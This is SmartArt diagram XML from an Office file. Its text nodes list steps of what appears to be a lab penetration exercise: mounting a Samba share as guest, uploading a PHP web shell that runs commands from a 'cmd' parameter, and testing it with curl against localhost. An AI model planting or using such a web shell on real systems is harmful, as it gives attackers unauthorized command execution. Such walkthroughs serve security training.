      <dgm:prSet presAssocID="{125078C4-51B5-4D9B-9F70-90CAE791FFEA}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{569C91AF-E90F-4EC5-BEBF-DB452E985C58}" type="pres">
      <dgm:prSet presAssocID="{2AB6C8DB-0E8D-478E-BA1D-A295FE6DB490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0215D4C8-3883-4E8C-8B59-CA4801FC3942}" type="pres">
      <dgm:prSet presAssocID="{06135685-1DBE-490B-A774-A178888C1B5B}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{47191A6C-A477-4D90-ACBB-7BB193FE2782}" type="pres">
      <dgm:prSet presAssocID="{545CC548-490C-4023-B43A-7F0196913B93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E396ADA5-50A8-46CA-867A-DEFBCF89A251}" type="pres">
      <dgm:prSet presAssocID="{8646B19C-F62C-4006-A5AB-A193D03A8070}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDCD4CA2-19BB-45F9-914C-D4C74F2AC34F}" type="pres">
      <dgm:prSet presAssocID="{5A8A009B-01CA-4F3C-AA3D-6818C02212FA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F05E363A-42FB-4F0C-B8E4-78601C8B70EA}" type="pres">
      <dgm:prSet presAssocID="{1F62896A-7E80-4D3C-B3D4-C1D2E59E3BA7}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E24C070F-3582-4BF7-88F8-B9974ED8BD7F}" type="pres">
      <dgm:prSet presAssocID="{DEE7C82E-435D-46AD-B8D1-33EA55318398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9FE85B52-CF78-4219-8255-700FA43E934B}" type="pres">
      <dgm:prSet presAssocID="{29269DEA-A1DD-4987-A43E-3CAA0A29F8C8}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{09847BAE-8F35-4AAB-91E7-103C46D2FD00}" type="pres">
      <dgm:prSet presAssocID="{9C696A35-F60D-4F51-B1EC-3241DC881D26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25721D02-3DD5-411C-96E5-936BEE20875F}" srcId="{1E6A4537-F208-4000-BDC0-AEA342E495C3}" destId="{545CC548-490C-4023-B43A-7F0196913B93}" srcOrd="3" destOrd="0" parTransId="{D863C5BE-361A-42D6-B6B4-41D56200C650}" sibTransId="{8646B19C-F62C-4006-A5AB-A193D03A8070}"/>
    <dgm:cxn modelId="{918FD215-3E23-4E30-9A7A-1E0DDC2553F7}" type="presOf" srcId="{9C696A35-F60D-4F51-B1EC-3241DC881D26}" destId="{09847BAE-8F35-4AAB-91E7-103C46D2FD00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A4160C26-3FE0-4FA4-A46C-BA330E22C349}" type="presOf" srcId="{5A8A009B-01CA-4F3C-AA3D-6818C02212FA}" destId="{EDCD4CA2-19BB-45F9-914C-D4C74F2AC34F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{47291931-8438-4777-B07D-E5CFD96AFFEF}" srcId="{1E6A4537-F208-4000-BDC0-AEA342E495C3}" destId="{9C696A35-F60D-4F51-B1EC-3241DC881D26}" srcOrd="6" destOrd="0" parTransId="{CBEFDF70-404C-45E0-A040-CDD60936E58A}" sibTransId="{779C7E54-AC62-4864-AA00-7CF38763DE10}"/>
    <dgm:cxn modelId="{8B14654D-9304-4FE1-A423-63BE5424DA1B}" type="presOf" srcId="{DEE7C82E-435D-46AD-B8D1-33EA55318398}" destId="{E24C070F-3582-4BF7-88F8-B9974ED8BD7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C1257550-468D-4153-9F19-770770399E6C}" srcId="{1E6A4537-F208-4000-BDC0-AEA342E495C3}" destId="{450BF256-40E9-4A40-BBD9-AE53DE5C3703}" srcOrd="1" destOrd="0" parTransId="{4081DBF6-E8B8-4D38-B424-CC56CAE6825A}" sibTransId="{125078C4-51B5-4D9B-9F70-90CAE791FFEA}"/>
    <dgm:cxn modelId="{6F5E9456-D060-48C3-93F5-D4B312206696}" type="presOf" srcId="{450BF256-40E9-4A40-BBD9-AE53DE5C3703}" destId="{528555C8-0CF9-4DAE-B7CC-9E71D49778EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A0FFDB83-C502-4846-B21F-558EFBFFFD23}" type="presOf" srcId="{55A7E4C0-A379-4895-B6F7-C8AD3B5EBCEF}" destId="{DB1C545F-6748-4DA7-8B30-11811361D0B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5852D494-C602-4CE0-B3F2-E953F43891F8}" srcId="{1E6A4537-F208-4000-BDC0-AEA342E495C3}" destId="{DEE7C82E-435D-46AD-B8D1-33EA55318398}" srcOrd="5" destOrd="0" parTransId="{F3959916-7B41-4CF1-9E2E-C01EAEE2E798}" sibTransId="{29269DEA-A1DD-4987-A43E-3CAA0A29F8C8}"/>
    <dgm:cxn modelId="{AE7D4BA1-F210-457F-A3D1-368ACDF6C434}" type="presOf" srcId="{1E6A4537-F208-4000-BDC0-AEA342E495C3}" destId="{95AB0B44-19FF-4989-9D8D-223860A36811}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5F3395A6-1FBA-416C-9C0F-E44C077F20EC}" type="presOf" srcId="{2AB6C8DB-0E8D-478E-BA1D-A295FE6DB490}" destId="{569C91AF-E90F-4EC5-BEBF-DB452E985C58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7779B1AF-58AC-4727-9C41-1584FCD483FB}" srcId="{1E6A4537-F208-4000-BDC0-AEA342E495C3}" destId="{5A8A009B-01CA-4F3C-AA3D-6818C02212FA}" srcOrd="4" destOrd="0" parTransId="{342455F6-8A0C-4951-AF42-45E848EEF7C0}" sibTransId="{1F62896A-7E80-4D3C-B3D4-C1D2E59E3BA7}"/>
    <dgm:cxn modelId="{7DBD6ED3-2AF0-478F-A970-F659E0C0C8AD}" srcId="{1E6A4537-F208-4000-BDC0-AEA342E495C3}" destId="{55A7E4C0-A379-4895-B6F7-C8AD3B5EBCEF}" srcOrd="0" destOrd="0" parTransId="{BB51D7EE-B2C1-4251-A43C-3D6518A3D392}" sibTransId="{036CB032-2F3D-4808-80D9-62A529EBAE1D}"/>
    <dgm:cxn modelId="{A6143BD9-D3C4-4207-B849-6DBD24600601}" srcId="{1E6A4537-F208-4000-BDC0-AEA342E495C3}" destId="{2AB6C8DB-0E8D-478E-BA1D-A295FE6DB490}" srcOrd="2" destOrd="0" parTransId="{6895ACA6-C3D5-4E1B-B848-38ED6E2E913B}" sibTransId="{06135685-1DBE-490B-A774-A178888C1B5B}"/>
    <dgm:cxn modelId="{38CB58FC-F406-4A1F-BB4D-76FAEB1AE4B8}" type="presOf" srcId="{545CC548-490C-4023-B43A-7F0196913B93}" destId="{47191A6C-A477-4D90-ACBB-7BB193FE2782}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A805DDE0-CA57-49A0-9B25-CF879BFAFB5E}" type="presParOf" srcId="{95AB0B44-19FF-4989-9D8D-223860A36811}" destId="{DB1C545F-6748-4DA7-8B30-11811361D0B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{934B78F6-7178-4C65-8C33-6107AD4F3B37}" type="presParOf" srcId="{95AB0B44-19FF-4989-9D8D-223860A36811}" destId="{7B597BA6-2CE4-468B-BBA7-6E18A595BB49}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{59D4D78E-B459-4105-86C7-83D05F8B1E93}" type="presParOf" srcId="{95AB0B44-19FF-4989-9D8D-223860A36811}" destId="{528555C8-0CF9-4DAE-B7CC-9E71D49778EC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{15D04327-B3FF-4915-9FEA-589286993E16}" type="presParOf" srcId="{95AB0B44-19FF-4989-9D8D-223860A36811}" destId="{3CBDFC58-53CD-41A2-9F5B-22F8FAC5E752}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{52C3A2B2-C6D0-43D8-AF44-76E98A84047F}" type="presParOf" srcId="{95AB0B44-19FF-4989-9D8D-223860A36811}" destId="{569C91AF-E90F-4EC5-BEBF-DB452E985C58}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DADE1A58-8656-44D4-A6F1-44742369CD50}" type="presParOf" srcId="{95AB0B44-19FF-4989-9D8D-223860A36811}" destId="{0215D4C8-3883-4E8C-8B59-CA4801FC3942}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{19D4D436-4F4E-4650-BBE2-3F22F7075D27}" type="presParOf" srcId="{95AB0B44-19FF-4989-9D8D-223860A36811}" destId="{47191A6C-A477-4D90-ACBB-7BB193FE2782}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{87756C7F-7BCE-4C1D-8902-15A7423D0C8E}" type="presParOf" srcId="{95AB0B44-19FF-4989-9D8D-223860A36811}" destId="{E396ADA5-50A8-46CA-867A-DEFBCF89A251}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{BBC7D294-EA0A-42F6-B0F5-3FDF547DCE3D}" type="presParOf" srcId="{95AB0B44-19FF-4989-9D8D-223860A36811}" destId="{EDCD4CA2-19BB-45F9-914C-D4C74F2AC34F}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{94DD65C4-53AC-4276-9EB7-A8446EFC866E}" type="presParOf" srcId="{95AB0B44-19FF-4989-9D8D-223860A36811}" destId="{F05E363A-42FB-4F0C-B8E4-78601C8B70EA}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DF06FB9F-028D-4BFE-B091-616B2B2D2ECF}" type="presParOf" srcId="{95AB0B44-19FF-4989-9D8D-223860A36811}" destId="{E24C070F-3582-4BF7-88F8-B9974ED8BD7F}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{44DBA1C8-8A9F-44C0-8AAD-965079839203}" type="presParOf" srcId="{95AB0B44-19FF-4989-9D8D-223860A36811}" destId="{9FE85B52-CF78-4219-8255-700FA43E934B}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{90AFABC9-4AE3-4F1C-A50F-2D9A825DD702}" type="presParOf" srcId="{95AB0B44-19FF-4989-9D8D-223860A36811}" destId="{09847BAE-8F35-4AAB-91E7-103C46D2FD00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8F06C5E-6CA8-4A62-82B7-A98F3C5A2A0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3EC1343-C851-4079-A7FE-B598548B6818}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>Mounted Samba share locally:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{913D03B7-E24E-4561-BF10-1DCA8A9F1001}" type="parTrans" cxnId="{EDB6E0C5-2C96-490A-AB8F-F39D06AB73E7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE5913AB-619C-4E7E-B89E-57CFAA5DB2A0}" type="sibTrans" cxnId="{EDB6E0C5-2C96-490A-AB8F-F39D06AB73E7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E5453892-8A90-4D55-9FD1-E23D9F43F60C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>sudo mount -t cifs //172.17.0.2/app /mnt/ -o username=guest,port=445</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{61235CA1-FA44-4400-B167-C8D8767AEC6E}" type="parTrans" cxnId="{44EF6E12-1FEE-4DF8-BA99-CB8D3257FAA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E58AFFD-BBA7-411F-A69E-D79144E98C0E}" type="sibTrans" cxnId="{44EF6E12-1FEE-4DF8-BA99-CB8D3257FAA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36E3E59B-DF9E-4FFE-B6BE-B9D154BB548D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>Uploaded shell.php for command execution:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA0DC135-4DDC-4EBB-AE1B-A53F72465ECD}" type="parTrans" cxnId="{4C90D48F-728A-406A-B13D-EF383E2FC108}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC9E6734-60A5-452E-AEB2-F91B3FBF2535}" type="sibTrans" cxnId="{4C90D48F-728A-406A-B13D-EF383E2FC108}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85D733A0-3AE4-4D31-9D6A-BE3559C12D16}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>&lt;?php system($_GET['cmd']); ?&gt;</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{450274E2-F18F-4001-920D-1D4C68E3AEAA}" type="parTrans" cxnId="{80547550-DCC6-47D4-8E05-2D308F1A1A95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A674DB0-C9E1-4067-B9A0-E39C4C2B0436}" type="sibTrans" cxnId="{80547550-DCC6-47D4-8E05-2D308F1A1A95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E7DF069-F713-4802-A845-07E7B4963056}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>Command execution tested successfully through webshell:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D034515F-E749-4464-B222-5CEAC7D17047}" type="parTrans" cxnId="{C0A6FC70-AE67-4321-9C65-F7A678811457}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{614096A8-1275-4864-AAED-A6EA5615B45D}" type="sibTrans" cxnId="{C0A6FC70-AE67-4321-9C65-F7A678811457}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F460A1B7-E7DD-427C-AB29-BCB340A0BA64}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>curl "http://127.0.0.1/shell.php?cmd=id"</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2B5047F-FD0A-4455-A110-84E0D91B876E}" type="parTrans" cxnId="{B2734A7F-8202-4FA5-8A0D-55E80706D9D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F3E9127-08B9-4E72-9646-5D9FD01E0911}" type="sibTrans" cxnId="{B2734A7F-8202-4FA5-8A0D-55E80706D9D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C37A420-FB4A-4B17-8C77-F74772FE64B7}" type="pres">
      <dgm:prSet presAssocID="{88F06C5E-6CA8-4A62-82B7-A98F3C5A2A0E}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1F2AD0FF-C7DA-467E-A00D-F121884F7B0D}" type="pres">
      <dgm:prSet presAssocID="{93EC1343-C851-4079-A7FE-B598548B6818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EE03A812-DA27-4533-BAEC-83F5F4EA004B}" type="pres">
      <dgm:prSet presAssocID="{FE5913AB-619C-4E7E-B89E-57CFAA5DB2A0}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BCB0BDDA-3E3A-426E-BB42-F489D2BB9A3B}" type="pres">
      <dgm:prSet presAssocID="{E5453892-8A90-4D55-9FD1-E23D9F43F60C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FF0BC3B6-F29A-4763-B5BF-3C8D7818F4CA}" type="pres">
      <dgm:prSet presAssocID="{7E58AFFD-BBA7-411F-A69E-D79144E98C0E}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2FA7907E-3152-4EFF-9FB5-9D0C15AFF392}" type="pres">
      <dgm:prSet presAssocID="{36E3E59B-DF9E-4FFE-B6BE-B9D154BB548D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8EE63B9B-3A9A-4343-8EBA-A64F12927E36}" type="pres">
      <dgm:prSet presAssocID="{FC9E6734-60A5-452E-AEB2-F91B3FBF2535}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3F9D28C0-D5FC-4BA0-8147-0508D3F93E01}" type="pres">
      <dgm:prSet presAssocID="{85D733A0-3AE4-4D31-9D6A-BE3559C12D1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A34B674-E8E6-447C-B8B4-F4F1A57D2F99}" type="pres">
      <dgm:prSet presAssocID="{6A674DB0-C9E1-4067-B9A0-E39C4C2B0436}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1428289C-C192-4ACB-AC7A-E9EBC896B303}" type="pres">
      <dgm:prSet presAssocID="{3E7DF069-F713-4802-A845-07E7B4963056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CB2FE49-E7A7-490A-BC4F-71C68C31B833}" type="pres">
      <dgm:prSet presAssocID="{614096A8-1275-4864-AAED-A6EA5615B45D}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2C2C4A3B-0C2E-48D1-A08D-A1A672B25D71}" type="pres">
      <dgm:prSet presAssocID="{F460A1B7-E7DD-427C-AB29-BCB340A0BA64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44EF6E12-1FEE-4DF8-BA99-CB8D3257FAA7}" srcId="{88F06C5E-6CA8-4A62-82B7-A98F3C5A2A0E}" destId="{E5453892-8A90-4D55-9FD1-E23D9F43F60C}" srcOrd="1" destOrd="0" parTransId="{61235CA1-FA44-4400-B167-C8D8767AEC6E}" sibTransId="{7E58AFFD-BBA7-411F-A69E-D79144E98C0E}"/>
    <dgm:cxn modelId="{068E6821-87E9-423A-9E49-D30291E84D3B}" type="presOf" srcId="{93EC1343-C851-4079-A7FE-B598548B6818}" destId="{1F2AD0FF-C7DA-467E-A00D-F121884F7B0D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{AFE15432-CE9B-4593-A305-C36F5F40D23E}" type="presOf" srcId="{E5453892-8A90-4D55-9FD1-E23D9F43F60C}" destId="{BCB0BDDA-3E3A-426E-BB42-F489D2BB9A3B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{80547550-DCC6-47D4-8E05-2D308F1A1A95}" srcId="{88F06C5E-6CA8-4A62-82B7-A98F3C5A2A0E}" destId="{85D733A0-3AE4-4D31-9D6A-BE3559C12D16}" srcOrd="3" destOrd="0" parTransId="{450274E2-F18F-4001-920D-1D4C68E3AEAA}" sibTransId="{6A674DB0-C9E1-4067-B9A0-E39C4C2B0436}"/>
    <dgm:cxn modelId="{C0A6FC70-AE67-4321-9C65-F7A678811457}" srcId="{88F06C5E-6CA8-4A62-82B7-A98F3C5A2A0E}" destId="{3E7DF069-F713-4802-A845-07E7B4963056}" srcOrd="4" destOrd="0" parTransId="{D034515F-E749-4464-B222-5CEAC7D17047}" sibTransId="{614096A8-1275-4864-AAED-A6EA5615B45D}"/>
    <dgm:cxn modelId="{5F75B35A-5644-4FD9-AAB4-E0D22D0E67E8}" type="presOf" srcId="{3E7DF069-F713-4802-A845-07E7B4963056}" destId="{1428289C-C192-4ACB-AC7A-E9EBC896B303}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B2734A7F-8202-4FA5-8A0D-55E80706D9D2}" srcId="{88F06C5E-6CA8-4A62-82B7-A98F3C5A2A0E}" destId="{F460A1B7-E7DD-427C-AB29-BCB340A0BA64}" srcOrd="5" destOrd="0" parTransId="{F2B5047F-FD0A-4455-A110-84E0D91B876E}" sibTransId="{5F3E9127-08B9-4E72-9646-5D9FD01E0911}"/>
    <dgm:cxn modelId="{C6E1B58B-BE15-41AD-B895-56B606784A3D}" type="presOf" srcId="{85D733A0-3AE4-4D31-9D6A-BE3559C12D16}" destId="{3F9D28C0-D5FC-4BA0-8147-0508D3F93E01}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4C90D48F-728A-406A-B13D-EF383E2FC108}" srcId="{88F06C5E-6CA8-4A62-82B7-A98F3C5A2A0E}" destId="{36E3E59B-DF9E-4FFE-B6BE-B9D154BB548D}" srcOrd="2" destOrd="0" parTransId="{DA0DC135-4DDC-4EBB-AE1B-A53F72465ECD}" sibTransId="{FC9E6734-60A5-452E-AEB2-F91B3FBF2535}"/>
    <dgm:cxn modelId="{A20978BB-DC0A-4192-ADFD-82CD02B1EDDF}" type="presOf" srcId="{F460A1B7-E7DD-427C-AB29-BCB340A0BA64}" destId="{2C2C4A3B-0C2E-48D1-A08D-A1A672B25D71}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EDB6E0C5-2C96-490A-AB8F-F39D06AB73E7}" srcId="{88F06C5E-6CA8-4A62-82B7-A98F3C5A2A0E}" destId="{93EC1343-C851-4079-A7FE-B598548B6818}" srcOrd="0" destOrd="0" parTransId="{913D03B7-E24E-4561-BF10-1DCA8A9F1001}" sibTransId="{FE5913AB-619C-4E7E-B89E-57CFAA5DB2A0}"/>
    <dgm:cxn modelId="{66D36FDA-BFAB-4E32-BEFF-F7D33A38A02A}" type="presOf" srcId="{88F06C5E-6CA8-4A62-82B7-A98F3C5A2A0E}" destId="{0C37A420-FB4A-4B17-8C77-F74772FE64B7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0789B3E5-BA58-48C3-9B4E-15FEE3402D58}" type="presOf" srcId="{36E3E59B-DF9E-4FFE-B6BE-B9D154BB548D}" destId="{2FA7907E-3152-4EFF-9FB5-9D0C15AFF392}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A2B18C2B-E974-41D8-A8AF-816E369EEDD6}" type="presParOf" srcId="{0C37A420-FB4A-4B17-8C77-F74772FE64B7}" destId="{1F2AD0FF-C7DA-467E-A00D-F121884F7B0D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D2B87915-7071-414F-925C-70E1AEA2D150}" type="presParOf" srcId="{0C37A420-FB4A-4B17-8C77-F74772FE64B7}" destId="{EE03A812-DA27-4533-BAEC-83F5F4EA004B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FA53CC9C-77FA-4CF3-B086-55D2B1BC3319}" type="presParOf" srcId="{0C37A420-FB4A-4B17-8C77-F74772FE64B7}" destId="{BCB0BDDA-3E3A-426E-BB42-F489D2BB9A3B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{72826165-9DDE-4923-B9DA-DB2D18E3952B}" type="presParOf" srcId="{0C37A420-FB4A-4B17-8C77-F74772FE64B7}" destId="{FF0BC3B6-F29A-4763-B5BF-3C8D7818F4CA}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5E93B18E-3AC0-4B8D-A001-B6729CA39C20}" type="presParOf" srcId="{0C37A420-FB4A-4B17-8C77-F74772FE64B7}" destId="{2FA7907E-3152-4EFF-9FB5-9D0C15AFF392}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{05E1D92A-3E53-46D7-8268-C76F37CF4F87}" type="presParOf" srcId="{0C37A420-FB4A-4B17-8C77-F74772FE64B7}" destId="{8EE63B9B-3A9A-4343-8EBA-A64F12927E36}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1580891D-6AC0-4AA8-B06B-C226467A1066}" type="presParOf" srcId="{0C37A420-FB4A-4B17-8C77-F74772FE64B7}" destId="{3F9D28C0-D5FC-4BA0-8147-0508D3F93E01}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5AAB71D4-E288-4953-973D-38C6B38C05DF}" type="presParOf" srcId="{0C37A420-FB4A-4B17-8C77-F74772FE64B7}" destId="{3A34B674-E8E6-447C-B8B4-F4F1A57D2F99}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{482BAFC7-89ED-4644-89A1-0CD81F0F90DE}" type="presParOf" srcId="{0C37A420-FB4A-4B17-8C77-F74772FE64B7}" destId="{1428289C-C192-4ACB-AC7A-E9EBC896B303}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0B3F5EFC-0358-4B0F-AC6B-83A18854B35F}" type="presParOf" srcId="{0C37A420-FB4A-4B17-8C77-F74772FE64B7}" destId="{DCB2FE49-E7A7-490A-BC4F-71C68C31B833}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
